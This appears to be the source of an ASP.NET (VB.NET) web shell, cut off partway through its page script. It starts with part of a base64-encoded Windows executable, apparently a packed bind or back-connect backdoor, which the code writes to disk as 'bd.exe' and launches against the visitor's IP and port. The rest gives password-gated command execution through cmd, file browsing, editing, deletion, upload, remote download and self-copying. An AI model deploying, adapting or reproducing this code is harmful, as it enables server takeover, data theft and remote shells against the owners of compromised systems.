"ZzYLmKMO7B+GHMu2aballsz/AwI0FnfLsiwEAgENzlNBU9vmaAGIIQ4JAgj8lyctc4JQRUwBAwCJ" & _ "C5Q/jIj9h+AADwELAQb0J3Zy2R3UFQQQAEAAEA+2YRNiEgcXYOxsFkyiDBAHy73sDQYAaESDR0DW" & _ "DQii/B7WEBvBLhh0Oi6Q4LOQDTCY+mAuck2YdYaLJwlTA5pb7JRqQC4mJxwKUPKbkkFQwBO0RQAA" & _ "aMVvsyQAAAD/AAAAAAAAAAAAAABgvgBQQACNvgDA//9Xg83/6xCQkJCQkJCKBkaIB0cB23UHix6D" & _ "7vwR23LtuAEAAAAB23UHix6D7vwR2xHAAdtz73UJix6D7vwR23PkMcmD6ANyDcHgCIoGRoPw/3R0" & _ "icUB23UHix6D7vwR2xHJAdt1B4seg+78EdsRyXUgQQHbdQeLHoPu/BHbEckB23PvdQmLHoPu/BHb" & _ "c+SDwQKB/QDz//+D0QGNFC+D/fx2D4oCQogHR0l19+lj////kIsCg8IEiQeDxwSD6QR38QHP6Uz/" & _ "//9eife5cAAAAIoHRyzoPAF394A/A3XyiweKXwRmwegIwcAQhsQp+IDr6AHwiQeDxwWI2OLZjb4A" & _ "UAAAiwcJwHRFi18EjYQwAHAAAAHzUIPHCP+WUHAAAJWKB0cIwHTcifl5Bw+3B0dQR7lXSPKuVf+W" & _ "VHAAAAnAdAeJA4PDBOvY/5ZkcAAAi65YcAAAjb4A8P//uwAQAABQVGoEU1f/1Y2H5wEAAIAgf4Bg" & _ "KH9YUFRQU1f/1VhhjUQkgGoAOcR1+oPsgOnbof//AAAAAAAAAAAAAAAAAAAAAAAAAHyAAABQgAAA" & _ "AAAAAAAAAAAAAAAAiYAAAGyAAAAAAAAAAAAAAAAAAACWgAAAdIAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAoIAAAK6AAAC+gAAAzoAAANyAAADqgAAAAAAAAPiAAAAAAAAAcwAAgAAAAABLRVJORUwzMi5E" & _ "TEwAQURWQVBJMzIuZGxsAFdTMl8zMi5kbGwAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MA" & _ "AFZpcnR1YWxQcm90ZWN0AABWaXJ0dWFsQWxsb2MAAFZpcnR1YWxGcmVlAAAARXhpdFByb2Nlc3MA" & _ "AABPcGVuU2VydmljZUEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" '//################# FUNCTION GOES HERE #######################==============================================] Private Declare Auto Function SHGetFileInfo Lib "shell32.dll" ( _ ByVal pszPath As String, _ ByVal dwFileAttributes As Int32, _ ByRef psfi As SHFILEINFO, _ ByVal cbFileInfo As Int32, _ ByVal uFlags As Int32) As IntPtr <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Auto, Pack:=1)> _ Private Structure SHFILEINFO Private Const MAX_PATH As Int32 = 260 Public hIcon As IntPtr Public iIcon As Int32 Public dwAttributes As Int32 <MarshalAs(UnmanagedType.ByValTStr, SizeConst:=MAX_PATH)> _ Public szDisplayName As String <MarshalAs(UnmanagedType.ByValTStr, SizeConst:=80)> _ Public szTypeName As String End Structure Private Const SHGFI_TYPENAME As Int32 = &H400 Private Function GetFileDescription(ByVal FileName As String) As String Dim shfi As SHFILEINFO = Nothing SHGetFileInfo(FileName, 0, shfi, Marshal.SizeOf(shfi), SHGFI_TYPENAME) Return shfi.szTypeName End Function Function xcleanpath(ByVal path As String) As String Dim strlen As String path = urldecode(Trim(path)) strlen = Len(path) If strlen > 0 Then Do While ((Mid(path, strlen) = "\") And (strlen > 0)) strlen = strlen - 1 path = Mid(path, 1, strlen) Loop Return path & "\" End If Return path End Function Function is_dir(ByVal path As String) As Boolean path = urldecode(path) Try Dim dInfo As New DirectoryInfo(path) If dInfo.Exists Then Return True End If Catch ex As Exception End Try Return False End Function Function is_file(ByVal path As String) As Boolean path = urldecode(path) Try Dim fInfo As New FileInfo(path) If fInfo.Exists Then Return True End If Catch ex As Exception End Try Return False End Function Function dirname(ByVal path As String) As String If (is_dir(path)) Then Dim di As New DirectoryInfo(path) Return xcleanpath(di.FullName) Else If (is_file(path)) Then Dim fi As New FileInfo(path) Return xcleanpath(fi.DirectoryName) End If End If Return xcleanpath(path) End Function Function nl2br(ByVal text As String) As String Return Replace(text, vbCrLf, "<br />") End Function Function urldecode(ByVal str As String) As String Return Server.UrlDecode(str) End Function Function urlencode(ByVal str As String) As String Return Server.UrlEncode(str) End Function Function base64_decode(ByVal base64String As String) As String Const Base64 As String = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" base64String = Replace(base64String, vbCrLf, "") base64String = Replace(base64String, vbTab, "") base64String = Replace(base64String, " ", "") Dim dataLength As String = Len(base64String) Dim sOut As String = "" For groupBegin As Integer = 1 To dataLength Step 4 Dim CharCounter, thisData As Integer Dim thisChar, pOut As Char Dim numDataBytes As Integer = 3 Dim nGroup As Integer = 0 For CharCounter = 0 To 3 thisChar = Mid(base64String, groupBegin + CharCounter, 1) If thisChar = "=" Then numDataBytes = numDataBytes - 1 thisData = 0 Else thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1 End If nGroup = 64 * nGroup + thisData Next nGroup = Hex(nGroup) nGroup = StrDup(6 - Len(nGroup), "0") & nGroup pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _ Chr(CByte("&H" & Mid(nGroup, 5, 2))) sOut = sOut & Left(pOut, numDataBytes) Next Return sOut End Function Function sort(ByVal arr_ As Array) As Array Dim buff As String = "" Dim temp As String = "" For Each b As String In arr_ buff = buff & b & "|" Next If ((Len(buff) - 1) > 0) Then Dim arr As Array = Split(Mid(buff, 1, Len(buff) - 1), "|") For i As Integer = UBound(arr) - 1 To 0 Step -1 For j As Integer = 0 To i If ((arr(j)) > (arr(j + 1))) Then temp = arr(j + 1) arr(j + 1) = arr(j) arr(j) = temp End If Next Next Return arr End If Return arr_ End Function Function htmlspecialchars(ByVal text As String) As String text = Replace(text, "&", "&") text = Replace(text, """", """) text = Replace(text, "'", "'") text = Replace(text, "<", "<") text = Replace(text, ">", ">") Return text End Function Function xfilesave(ByVal FileName As String, ByVal allbytes() As Byte) As Boolean Dim fi As New FileInfo(FileName) If fi.Exists Then fi.Delete() If fi.Exists Then Return False End If End If File.WriteAllBytes(FileName, allbytes) Dim ffi As New FileInfo(FileName) If ffi.Exists Then Return True End If Return False End Function Function xfileopen(ByVal filepath As String, ByVal binary As Boolean) As String filepath = urldecode(filepath) If (binary) Then Dim fi As New FileInfo(filepath) If fi.Exists Then Return System.Text.Encoding.UTF8.GetString(File.ReadAllBytes(filepath)) End If Else Dim fi As New FileInfo(filepath) If fi.Exists Then Return File.ReadAllText(filepath) End If End If Return "" End Function Function xparsefilesize(ByVal size As Integer) As String If (size <= 1024) Then Return size Else If (size <= 1024 * 1024) Then Return FormatNumber(size / 1024, 2) & " kb" Else Return FormatNumber(size / 1024 / 1024, 2) & " mb" End If End If End Function Function xfileperms(ByVal fpath As String) As String Dim isreadable As String = "r" Dim iswriteable As String = "-" If is_file(fpath) Then Dim fi As New FileInfo(fpath) If Not (fi.Attributes And FileAttributes.ReadOnly) Then iswriteable = "w" End If ElseIf is_dir(fpath) Then Dim fi As New DirectoryInfo(fpath) If Not (fi.Attributes And FileAttributes.ReadOnly) Then iswriteable = "w" End If End If Return isreadable & " / " & iswriteable End Function Function xdateformat(ByVal tgl As Date) As String Return tgl.ToString("dd-MMM-yyyy HH:mm") End Function Function xfilelastmodified(ByVal fpath As String) As String fpath = urldecode(fpath) If ((is_dir(fpath)) Or (is_file(fpath))) Then Dim di As New DirectoryInfo(fpath) Return xdateformat(di.LastWriteTime) End If Return "???" End Function Function xparentfolder(ByVal sdir As String) As String sdir = urldecode(sdir) If Directory.Exists(sdir) Then Dim di As New DirectoryInfo(sdir) If di.Parent IsNot Nothing Then Dim testt As String = xcleanpath(di.Parent.FullName) Return testt End If End If Return sdir End Function Function xfilesummary(ByVal fpath As String) As String Dim buff As String = "" If (is_file(fpath)) Then buff = "Filesize : " & xparsefilesize(xfilesize(fpath)) & " ( " & xfilesize(fpath) & " ) <span class=""gaul""> :: </span>Permission : " & xfileperms(fpath) & " ( " & xfileowner(fpath) & " )<span class=""gaul""> :: </span>modified : " & xfilelastmodified(fpath) End If Return buff End Function Function xfilesize(ByVal fpath As String) As Long If (is_file(fpath)) Then Dim fi As New FileInfo(fpath) Return fi.Length End If Return 0 End Function Function xfileowner(ByVal fpath As String) As String If (is_file(fpath)) Then Dim fi As New FileInfo(fpath) Dim ds As System.Security.AccessControl.FileSecurity = fi.GetAccessControl Dim ir As System.Security.Principal.IdentityReference = ds.GetOwner(GetType(System.Security.Principal.NTAccount)) Return ir.Value.Substring(InStr(ir.Value.ToString, "\")) ElseIf (is_dir(fpath)) Then Dim di As New FileInfo(fpath) Try Dim ds As System.Security.AccessControl.FileSecurity = di.GetAccessControl Dim ir As System.Security.Principal.IdentityReference = ds.GetOwner(GetType(System.Security.Principal.NTAccount)) Return ir.Value.Substring(InStr(ir.Value.ToString, "\")) Catch ex As Exception End Try End If Return "???" End Function Function ekse(ByVal cmd As String, ByVal cwd As String) As String Dim p As System.Diagnostics.Process = New System.Diagnostics.Process() With p.StartInfo .FileName = Environ("COMSPEC") .CreateNoWindow = True .RedirectStandardInput = True .RedirectStandardOutput = True .RedirectStandardError = True .UseShellExecute = False .WorkingDirectory = xcleanpath(urldecode(Request.QueryString("dir"))) .Arguments = "/C " & cmd End With p.Start() Dim all As String = p.StandardOutput.ReadToEnd p.Close() Return all End Function Function OSver() As String Return System.Environment.OSVersion.VersionString End Function Function xparsedir(ByVal dir As String) As String Dim dirs() As String = Split(dir, "\") Dim buff As String = "" Dim dlink As String = "" For Each d As String In dirs d = Trim(d) If (d <> "") Then dlink = dlink & urlencode(d & "\") buff &= "<a href=""?dir=" & dlink & """>" & d & " " & "\" & "</a> " End If Next Return "<span class=""gaul"">[ </span>" & buff & "<span class=""gaul""> ]</span>" End Function Function xrunexploit(ByVal fpath As String, ByVal base64 As String, ByVal port As String, ByVal ip As String) As Boolean Dim con() As Byte = Convert.FromBase64String(wBind) Dim ok As Boolean = False Dim final As String = "" If (is_file(fpath)) Then File.Delete(fpath) End If If (xfilesave(fpath, con)) Then Dim p As Process = New Process With p.StartInfo .FileName = fpath .CreateNoWindow = True .Arguments = port & " " & ip End With p.Start() Return True End If Return False End Function Function xdrive() As String Dim buff, letters, lett As String letters = "" buff = "" For Each letter As DriveInfo In DriveInfo.GetDrives lett = Mid(letter.Name, 1, 1) letters = "<a href=""?dir=" & lett & ":\""><span class=""gaul"">[ </span>" letters &= lett letters &= "<span class=""gaul""> ]</span</a> " buff &= letters Next If (buff <> "") Then buff = buff & "<br />" End If Return buff End Function Public Sub xrmdir(ByVal path As String) path = xcleanpath(path) path = Mid(path, 1, Len(path) - 1) Dim di As New DirectoryInfo(path) If di.Exists Then For Each di_ As DirectoryInfo In di.GetDirectories xrmdir(di_.FullName) Next For Each fi_ As FileInfo In di.GetFiles fi_.Delete() Next End If di.Delete() End Sub Function xdir(ByVal path As String) As String path = Trim(urldecode(path)) path = xcleanpath(path) Dim buff, sf, sd, dd, nextdir As String buff = "" If (is_dir(path)) Then Dim fi As New DirectoryInfo(path) Dim xfname As New ArrayList Dim xdname As New ArrayList For Each xf As FileInfo In fi.GetFiles xfname.Add(xf.FullName) Next For Each xd As DirectoryInfo In fi.GetDirectories xdname.Add(xd.FullName) Next xfname.Sort() xdname.Sort() buff = "<div id=""explorer""><table class=""tblExplorer"">" & _ "<tr><th>Filename</th>" & _ "<th style=""width:80px;"">Filesize</th>" & _ "<th style=""width:80px;"">Permission</th>" & _ "<th style=""width:150px;"">Last Modified</th>" & _ "<th style=""width:180px;"">Action</th></tr>" If (Len(path) > 3) Then sd = "." dd = xcleanpath(path) buff &= "<tr onmouseover=""this.style.cursor='pointer';this.style.cursor='hand';"" onclick=""window.location= '?dir=" & urlencode(dd) & "';"">" & _ "<td><span style=""font-weight:bold;""><a href=""?dir=" & xcleanpath(dd) & """>[</span> " & sd & " <span style=""font-weight:bold;"">]</span></a></td>" & _ "<td>DIR</td>" & _ "<td style=""text-align:center;"">" & xfileperms(dd) & "</td>" & _ "<td style=""text-align:center;"">" & xfilelastmodified(dd) & "</td>" & _ "<td style=""text-align:center;""><a href=""?dir=" & dd & "&properties=" & xcleanpath(dd) & """>Properties</a> | <a href=""?dir=" & xcleanpath(xparentfolder(dd)) & "&del=" & xcleanpath(dd) & """>Remove</a></td>" & _ "</tr>" sd = ".." dd = xcleanpath(xparentfolder(path)) buff &= "<tr onmouseover=""this.style.cursor='pointer';this.style.cursor='hand';"" onclick=""window.location= '?dir=" & urlencode(dd) & "';"">" & _ "<td><span style=""font-weight:bold;""><a href=""?dir=" & dd & """>[</span> " & sd & " <span style=""font-weight:bold;"">]</span></a></td>" & _ "<td>DIR</td>" & _ "<td style=""text-align:center;"">" & xfileperms(dd) & "</td>" & _ "<td style=""text-align:center;"">" & xfilelastmodified(dd) & "</td>" & _ "<td style=""text-align:center;""><a href=""?dir=" & xcleanpath(dd) & "&properties=" & xcleanpath(dd) & """>Properties</a> | <a href=""?dir=" & xcleanpath(xparentfolder(xparentfolder(dd))) & "&del=" & xcleanpath(dd) & """>Remove</a></td>" & _ "</tr>" End If For Each d As String In xdname Dim di As New DirectoryInfo(d) sd = di.Name nextdir = xcleanpath(path) buff &= "<tr onmouseover=""this.style.cursor='pointer';this.style.cursor='hand';"" onclick=""window.location= '?dir=" & urlencode(d) & "';"">" & _ "<td><span style=""font-weight:bold;""><a href=""?dir=" & xcleanpath(d) & """>[</span> " & sd & " <span style=""font-weight:bold;"">]</span></a></td>" & _ "<td>DIR</td>" & _ "<td style=""text-align:center;"">" & xfileperms(d) & "</td>" & _ "<td style=""text-align:center;"">" & xfilelastmodified(d) & "</td>" & _ "<td style=""text-align:center;""><a href=""?dir=" & xcleanpath(d) & "&properties=" & xcleanpath(d) & """>Properties</a> | <a href=""?dir=" & xcleanpath(nextdir) & "&del=" & xcleanpath(d) & """>Remove</a></td>" & _ "</tr>" Next For Each f As String In xfname Dim fiz As New FileInfo(f) sf = fiz.Name Dim View As String = "?dir=" & urlencode(path) & "&view=" & urlencode(f) buff &= "<tr onmouseover=""this.style.cursor='pointer';this.style.cursor='hand';"" onclick=""window.location='?dir=" & urlencode(xcleanpath(path)) & "&properties=" & urlencode(f) & "';""><td>" & _ "<a href=""?dir=" & urlencode(xcleanpath(path)) & "&properties=" & urlencode(f) & """>" & _ sf & "</a></td>" & _ "<td>" & xparsefilesize(xfilesize(f)) & "</td>" & _ "<td style=""text-align:center;"">" & xfileperms(f) & "</td>" & _ "<td style=""text-align:center;"">" & xfilelastmodified(f) & "</td>" & _ "<td style=""text-align:center;""><a href=""" & View & """>Edit</a> | <a href=""?get=" & f & """>Download</a> | <a href=""?dir=" & xcleanpath(path) & "&del=" & f & """>Remove</a></td>" & _ "</tr>" Next buff &= "</table></div>" End If Return buff End Function '//################# INIT GOES HERE #######################==================================================] Dim xCwd As String = "" Dim check As String = "" Dim uname As String = "" Dim auth As Boolean = False Public Sub Page_Load() On Error Resume Next Session.LCID = 2057 Server.ScriptTimeout = 600 ' server software Dim xSoftware As String = Request.ServerVariables("SERVER_SOFTWARE") ' uname -a Dim xSystem As String = OSver() ' server ip Dim xServerIP As String = Request.ServerVariables("LOCAL_ADDR") ' your ip ;-) Dim xClientIP As String = Request.ServerVariables("REMOTE_ADDR") Dim xHeader As String = xSoftware & "<br />" & xSystem & "<br />Server IP: <span class=""gaul"">[ </span>" & xServerIP & "<span class=""gaul""> ]</span> Your IP: <span class=""gaul"">[ </span>" & xClientIP & "<span class=""gaul""> ]</span>" Dim shell_style As String = "" & _ "<style type=""text/css"">" & _ "*{" & _ " font-family:Tahoma,Verdana,Arial;" & _ " font-size:12px;" & _ " line-height:20px;" & _ "}" & _ "form{" & _ " margin:0 auto;" & _ " text-align:center;" & _ "}" & _ "body{" & _ " background:url('" & Request.ServerVariables("SCRIPT_NAME") & "?img=bg') #333333;" & _ " color:#ffffff;" & _ " margin:0;" & _ " padding:0;" & _ "}" & _ "input,textarea{" & _ " background:url('" & Request.ServerVariables("SCRIPT_NAME") & "?img=bg') #111111;" & _ " height:24px;" & _ " color:#ffffff;" & _ " padding:1.5px 4px 0 4px;" & _ " margin:2px 0;" & _ " border:1px solid " & shell_color & ";" & _ " border-bottom:4px solid " & shell_color & ";" & _ " vertical-align:middle;" & _ "}" & _ "input:hover,textarea:hover{" & _ " background:#0a0a0a;" & _ "}" & _ "a{" & _ " color:#ffffff;" & _ " text-decoration:none;" & _ "}" & _ "a:hover{" & _ " border-bottom:1px solid #ffffff;" & _ "}" & _ "h1{" & _ " font-size:17px;" & _ " height:20px;" & _ " padding:2px 8px;" & _ " background:" & shell_color & ";" & _ " border:0;" & _ " border-left:4px solid " & shell_color & ";" & _ " border-right:4px solid " & shell_color & ";" & _ " border-bottom:1px solid #222222;" & _ " margin:0 auto;" & _ " width:90%;" & _ "}" & _ "h1 img{" & _ " vertical-align:bottom;" & _ "}" & _ ".box{" & _ " margin:0 auto;" & _ " background:#000000;" & _ " border:4px solid " & shell_color & ";" & _ " padding:4px 8px;" & _ " width:90%;" & _ " text-align:justify;" & _ "}" & _ ".gaul{" & _ " color:" & shell_color & ";" & _ "}" & _ ".result, .boxcode{" & _ " margin:0 auto;" & _ " border:1px solid " & shell_color & ";" & _ " font-family:Lucida Console,Tahoma,Verdana;" & _ " padding:8px;" & _ " text-align:justify;" & _ " overflow:hidden;" & _ " color:#ffffff;" & _ "}" & _ "#explorer, table{" & _ " width:100%;" & _ "}" & _ "table th{" & _ " border-bottom:1px solid " & shell_color & ";" & _ " background:#111111;" & _ " padding:4px;" & _ "}" & _ "table td{" & _ " padding:4px;" & _ " border-bottom:1px solid #111111;" & _ " vertical-align:top;" & _ "}" & _ ".tblExplorer tr:hover, .hexview td:hover{" & _ " background:" & shell_color & ";" & _ "}" & _ ".hidden{" & _ " display:none;" & _ "}" & _ ".tblbox td {" & _ " margin:0;" & _ " padding:0;" & _ " border-bottom:1px solid #222222;" & _ "}" & _ ".tblbox tr:hover{" & _ " background:none;" & _ "}" & _ "#mainwrapper{" & _ " width:100%;" & _ " margin:20px auto;" & _ " text-align:center;" & _ "}" & _ "#wrapper{" & _ " width:90%;" & _ " margin:auto;" & _ "}" & _ ".cmdbox{" & _ " border-top:1px solid " & shell_color & ";" & _ " border-bottom:1px solid " & shell_color & ";" & _ " margin:4px 0;" & _ " width:100%;" & _ "}" & _ ".fpath{" & _ " border-top:1px solid " & shell_color & ";" & _ " border-bottom:1px solid " & shell_color & ";" & _ " margin:4px 0;" & _ " padding:4px 0;" & _ "}" & _ ".fprop{" & _ " border-top:1px solid " & shell_color & ";" & _ " border-bottom:1px solid " & shell_color & ";" & _ " margin:4px 0;" & _ " padding:4px 0;" & _ "}" & _ ".bottomwrapper{" & _ " text-align:center;" & _ "}" & _ ".btn{" & _ " height:24px;" & _ " background:url('" & Request.ServerVariables("SCRIPT_NAME") & "?img=bg') #111111;" & _ " font-size:10px;" & _ " text-align:right;" & _ "}" & _ ".hexview , .hexview td{" & _ " font-family: Lucida Console,Tahoma;" & _ "}" & _ "</style>" If (Request.Form("passw") <> "") Then check = Trim(Request.Form("passw")) If (check = shell_password) Then Response.Cookies.Set(New HttpCookie("pass", check)) Response.Cookies("pass").Expires = Date.Now.AddDays(7) Else Response.Cookies.Set(New HttpCookie("pass", check)) Response.Cookies("pass").Expires = Date.MinValue End If End If If ((Request.Cookies("pass").Value <> "") And (Request.Form("passw") = "")) Then check = Request.Cookies("pass").Value End If If (check = shell_password) Then auth = True Else auth = False End If If (Request.QueryString("img") <> "") Then Dim sfile As String = Request.QueryString("img") If (is_file(sfile)) Then Response.Clear() Response.ContentType = "image/jpeg" Response.BinaryWrite(File.ReadAllBytes(sfile)) Response.End() Else Response.Clear() Response.Buffer = True Response.ContentType = "image/png" Dim buff As String If sfile = "bg" Then buff = bg Else buff = icon End If Response.BinaryWrite(Convert.FromBase64String(buff)) Response.End() End If End If If (Request.QueryString("get") <> "") Then Dim sFile As String = Request.QueryString("get") Dim fname As String = Mid(sFile, InStrRev(sFile, "\") + 1) Response.ContentType = "application/x-msdownload" Response.AddHeader("Content-transfer-encoding", "binary") Response.AddHeader("Content-Disposition", "attachment;filename=" & fname & "") Response.Write(xfileopen(sFile, True)) Response.End() End If If ((Request.QueryString("btnConnect") <> "") And (IsNumeric(Request.QueryString("bportC")))) Then Dim port As String = Request.QueryString("bportC") Dim fname As String = "bd.exe" Dim fpath As String = xcleanpath(urldecode(Trim(Request.QueryString("dir")))) & fname If (xrunexploit(fpath, wBind, port, xClientIP)) Then End If ElseIf ((Request.QueryString("btnListen") <> "") And (IsNumeric(Request.QueryString("lportC")))) Then Dim port As String = Request.QueryString("lportC") Dim fname As String = "bd.exe" Dim fpath As String = xcleanpath(urldecode(Trim(Request.QueryString("dir")))) & fname If (xrunexploit(fpath, wBind, port, "")) Then End If End If Dim uploaded As Boolean = False Dim newdir As String = "" If (Request.QueryString("dir") = "") Then xCwd = Mid(Request.ServerVariables("PATH_TRANSLATED"), 1, InStrRev(Request.ServerVariables("PATH_TRANSLATED"), "\")) Else newdir = xcleanpath(Trim(Request.QueryString("dir"))) If (is_dir(newdir)) Then xCwd = newdir End If If (Request.Form("btnNewUploadLocal") <> "") Then Dim uname As String If (Trim(ufname.Value) <> "") Then uname = Trim(ufname.Value) Else uname = filelocal.PostedFile.FileName End If filelocal.PostedFile.SaveAs(xcleanpath(xCwd) & uname) ElseIf (Request.Form("btnNewUploadUrl") <> "") Then Dim uname As String If (Trim(ufname.Value) <> "") Then uname = Trim(ufname.Value) Else Dim m As Match = Regex.Match(fileurl.Value, ".*\/([^/?]*)\??", RegexOptions.IgnoreCase) uname = m.Groups(1).Value End If Dim webcl As WebClient = New WebClient webcl.DownloadFile(fileurl.Value, xcleanpath(xCwd) & uname) End If End If If (Request.QueryString("foldername") <> "") Then Dim fname As String = xcleanpath(Trim(Request.QueryString("foldername"))) If (Not is_dir(newdir & fname)) Then MkDir(newdir & fname) End If ElseIf (Request.QueryString("del") <> "") Then Dim fdel As String = Trim(Request.QueryString("del")) If (is_file(fdel)) Then File.Delete(fdel) ElseIf (is_dir(fdel)) Then xrmdir(fdel) newdir = xparentfolder(fdel) End If ElseIf (Request.QueryString("childname") <> "") Then Dim childname As String = newdir & Trim(Request.QueryString("childname")) Dim con As String = xfileopen(Request.ServerVariables("PATH_TRANSLATED"), False) If (xfilesave(childname, Encoding.ASCII.GetBytes(con))) Then End If End If xCwd = xcleanpath(xCwd) If (Request.QueryString("cmd") <> "") Then Dim cmd As String cmd = Trim(Request.QueryString("cmd")) Dim pos As Integer = InStr(LCase(cmd), "cd ") Dim m As Match = Regex.Match(cmd, "[a-zA-Z]{1}:.*", RegexOptions.IgnoreCase) If pos = 1 Then newdir = Trim(Mid(cmd, 3)) If (newdir = "\") Then xCwd = Mid(xCwd, 1, 3) Else If (InStr(newdir, ":") > 0) Then If (is_dir(newdir)) Then Dim di As New DirectoryInfo(newdir) xCwd = xcleanpath(di.FullName) End If Else If (is_dir(xCwd & newdir)) Then Dim di As New DirectoryInfo(xCwd & newdir) xCwd = xcleanpath(di.FullName) End If End If End If resultbox.InnerHtml = xdir(xCwd) ElseIf m.Success Then Dim ne As String = m.Value If (is_dir(ne)) Then xCwd = xcleanpath(ne) End If resultbox.InnerHtml = xdir(xCwd) Else Dim result As String = ekse(cmd, xCwd) If (result = "") Then resultbox.InnerHtml = xdir(xCwd) Else result = Replace(htmlspecialchars(result), " ", " ") resultbox.InnerHtml = Trim(nl2br(result)) End If End If ElseIf (Request.QueryString("properties") <> "") Then Dim fname As String = xcleanpath(Request.QueryString("properties")) If (Request.QueryString("oldfilename") <> "") Then Dim oldname As String = Request.QueryString("oldfilename") File.Move(oldname, fname) End If Dim Dir As String = Request.QueryString("dir") Dim fcont As String = "" Dim fview As String = "" Dim fsize As String = "" Dim faction As String = "" Dim filectime As String = "" Dim fileatime As String = "" Dim filemtime As String = "" Dim code As String = "" Dim imglink As String = "" If (is_dir(fname)) Then fsize = "DIR" fname = Mid(fname, 1, Len(fname) - 1) fcont = xdir(fname) faction = "<a href=""?dir=" & xcleanpath(fname) & "&properties=" & xcleanpath(fname) & """>Properties</a> | <a href=""?dir=" & xcleanpath(xparentfolder(fname)) & "&del=" & xcleanpath(fname) & """>Remove</a>" Dim di As New DirectoryInfo(fname) filectime = xdateformat(di.CreationTime) fileatime = xdateformat(di.LastAccessTime) filemtime = xdateformat(di.LastWriteTime) Else fname = Mid(fname, 1, Len(fname) - 1) fsize = xparsefilesize(xfilesize(fname)) & " <span class=""gaul"">( </span>" & xfilesize(fname) & " bytes<span class=""gaul""> )</span>" Dim xtype As String = "" Dim mtype As String = "" If (Request.QueryString("type") <> "") Then xtype = Request.QueryString("type") Else mtype = GetFileDescription(fname) Dim s As Match = Regex.Match(mtype, "image|img", RegexOptions.IgnoreCase) If s.Success Then xtype = "img" Else xtype = "text" End If End If If (xtype = "img") Then imglink = "<p><a href=""?img=" & fname & """ target=""_blank""><span class=""gaul"">[ </span>view full size<span class=""gaul""> ]</span></a></p>" fcont = "<div style=""text-align:center;width:100%;"">" & imglink & "<img width=""800"" src=""?img=" & fname & """ alt="""" style=""margin:8px auto;padding:0;border:0;"" /></div>" Else code = htmlspecialchars(xfileopen(fname, False)) fcont = "<div class=""boxcode"">" & nl2br(code) & "</div>" End If Dim fi As New FileInfo(fname) filectime = xdateformat(fi.CreationTime) fileatime = xdateformat(fi.LastAccessTime) filemtime = xdateformat(fi.LastWriteTime) faction = "<a href=""?dir=" & xcleanpath(Dir) & "&view=" & fname & """>Edit</a> | <a href=""?get=" & fname & """>Download</a> | <a href=""?dir=" & xcleanpath(Dir) & "&del=" & fname & """>Remove</a>" fview = "<a href=""?dir=" & xcleanpath(Dir) & "&properties=" & fname & "&type=text""><span class=""gaul"">[ </span>text<span class=""gaul""> ]</span></a><a href=""?dir=" & xcleanpath(Dir) & "&properties=" & fname & "&type=img""><span class=""gaul"">[ </span>image<span class=""gaul""> ]</span></a>" End If Dim fowner As String = xfileowner(fname) Dim fperm As String = xfileperms(fname) resultbox.InnerHtml = "<div style=""display:inline;"">" & _ "<form action=""?"" method=""get"" style=""margin:0;padding:1px 8px;text-align:left;"">" & _ "<input type=""hidden"" name=""dir"" value=""" & xCwd & """ />" & _ "<input type=""hidden"" name=""oldfilename"" value=""" & fname & """ />" & faction & " | " & _ "<span><input style=""width:50%;"" type=""text"" name=""properties"" value=""" & fname & """ /> " & _ "<input style=""width:120px"" class=""btn"" type=""submit"" name=""btnRename"" value=""Rename"" />" & _ "</span>" & _ "<div class=""fprop"">" & _ "Size = " & fsize & "<br />" & _ "Owner = <span class=""gaul"">( </span>" & fowner & "<span class=""gaul""> )</span><br />" & _ "Permission = <span class=""gaul"">( </span>" & fperm & "<span class=""gaul""> )</span><br />" & _ "Create Time = <span class=""gaul"">( </span>" & filectime & "<span class=""gaul""> )</span><br />" & _ "Last Modified = <span class=""gaul"">( </span>" & filemtime & "<span class=""gaul""> )</span><br />" & _ "Last Accessed = <span class=""gaul"">( </span>" & fileatime & "<span class=""gaul""> )</span><br />" & _ fview & _ "</div>" & fcont & _ "</form>" & _ "</div>" ElseIf ((Request.QueryString("view") <> "") Or (Request.QueryString("filename") <> "")) Then Dim msg As String = "" Dim fname As String = "" If (Request.Form("save") = "Save As") Then fname = Trim(Request.Form("saveas")) Dim Content As String = Request.Form("filesource") Dim pesan As String = "" If (xfilesave(fname, Encoding.ASCII.GetBytes(Content))) Then pesan = "File Saved" Else pesan = "Failed to save file" End If msg = "<span style=""float:right;""><span class=""gaul"">[ </span>" & pesan & "<span class=""gaul""> ]</span></span>" Else If (Request.QueryString("view") <> "") Then fname = Trim(Request.QueryString("view")) Else fname = xCwd & Trim(Request.QueryString("filename")) End If End If Dim result As String = xfileopen(fname, False) result = htmlspecialchars(result) resultbox.InnerHtml = "<p style=""padding:0;margin:0;text-align:left;""><a href=""?dir=" & xCwd & "&properties=" & fname & """>" & xfilesummary(fname) & "</a>" & msg & "</p><div style=""clear:both;margin:0;padding:0;""></div>" & _ "<form action=""?dir=" & xCwd & "&view=" & fname & """ method=""post"">" & _ "<textarea name=""filesource"" style=""width:100%;height:200px;"">" & result & "</textarea>" & _ "<input type=""text"" style=""width:80%;"" name=""saveAs"" value=""" & fname & """ /> " & _ "<input type=""submit"" class=""btn"" style=""width:120px;"" name=""save"" value=""Save As"" /></form>" Else resultbox.InnerHtml = xdir(xCwd) End If '//################# Finalizing #######################======================================================] Dim html_title, html_head, html_body, html_onload, html_final, html_script As String If ((Request.QueryString("cmd") <> "") Or (Request.Form("passw") <> "")) Then html_onload = "function setfocus(){ document.getElementById('cmd').focus(); }" Else html_onload = "function setfocus(){ return true; }" End If html_script = "<scrift 